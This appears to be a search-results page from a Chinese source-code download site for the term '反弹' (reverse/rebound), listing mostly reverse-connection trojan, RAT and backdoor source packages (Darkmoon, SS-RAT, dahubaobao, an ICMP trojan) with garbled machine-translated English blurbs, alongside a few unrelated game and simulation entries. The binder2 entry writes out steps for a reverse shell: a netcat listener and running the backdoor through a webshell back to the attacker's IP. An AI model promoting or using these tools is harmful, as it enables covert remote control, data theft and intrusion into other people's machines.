搜索资源列表
Minirat
- 自编释修改反弹*,意思就是将这个不错的反弹*源代码(服务端只有十几K)占为己有,做出自已的终身*服务端!还不快快动手吧。。。。。。 装个delphi7就可操作了,不用装什么控件,- From arranges releases the revision resilience wooden horse, the meaning is (service end only has this good resilience w
二维图形游戏编程实例
- 二维图形游戏编程的几个很好的实例,如BMP图形创建、碰撞反弹、色彩混合等演示、动画。-2D game programming in several good examples, such as the creation of BMP graphics, collision rebound, such as color mixing demonstration of animation.
SpriteAnimate
- 动画屏保,一个图标有十几个实例在屏幕中游动,遇到边界即反弹!可以作为屏保的参考实例。-animated screensavers, icons have a dozen examples of the screen cursor, which encountered the border rebound! The screensaver can be used as reference case.
获取公网IP
- 获取公网IP.想写反弹类型的*的朋友可以参考一下。-public IP access. Write rebound type of Trojan friends can reference.
ftmmym
- 插入反弹*,不用多说大家都知道!只做研究用!-inserted rebound Trojans, we all know the answer! Do research!
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd.
reverse0617
- 反弹端口的实现reverse0617-rebound port achieve reverse0617
Darkmoon
- 国外著名的远程控制软件(*)Darkmoon的源代码,反弹端口,进程注入.要学习写*的值得一看-famous remote control software (Trojans) Darkmoon source code rebound ports, the process of implantation. Learning to write is worth looking at the Trojans
muma123123
- 一个Delphi写的简单的反弹*,主要更能是实现反弹-Delphi write a simple rebound Trojans, it is better to achieve major rebound
dahubaobao
- 用c语言编写的dahubaobao反弹后门程序,很好用,可以试一下.-prepared dahubaobao rebound back door that is useful, can try.
fantanshi
- 反弹式源代码,有远程抓屏,开关机,修改注册表,上传下载文件等功能-rebound-source code, the distance Capturing the Screen, switching machines, modify the registry, file uploading and downloading functions
mumaruanjian
- 反弹*.截屏,发送信息,等等,都是一些经典的源码-rebound Trojan. Cut screen, send messages, etc., are some of the classic source
mymm
- 反弹式*源码 好好学习,天天向上! 不用多说,好东东!-rebound Trojan-source study hard, make progress day by day! Needless to say, good Dong!
vcmm
- VC编写精小反弹穿墙*,控制端,服务端代码-VC
SS-RAT0.4Final
- SS-RAT 0.4 Final 国外有名的反弹远程控制*的代码-SS-RAT 0.4 Final this is trojan delphi code
four_Trojans
- 几个经典的反弹*源代码,其中有些代码有点小错,代码也很老了,不过代码精炼,功能具备,有借鉴意义-The rebound of several classic Trojan source code, some code a little wrong, the code is also very old, but refining the code, function in place, there is reference
Poiseuille半反弹C++代码
- Poiseuille半程反弹代码,效果比全程反弹好,可以较好的模拟(Poiseuille half-way bounce code)
dd.rar
- ICMP反弹*研究对于ICMP*,除非你使用嗅探器或者监视windows的SockAPI调用,否则从网络上是很难发现*的行踪的(关于进程的隐藏及破解会在下一篇文章中进行讨论),那么,有什么可以补救的方法呢?有的,就是过滤ICMP报文,对于win2000可以使用系统自带的路由功能对ICMP协议进行过滤,win2000的Routing(Research on ICMP rebounding Trojan horse)
砖块反弹
- 一个碰到砖块反弹的小程序,启发算法写作。(A small program that hits a brick.)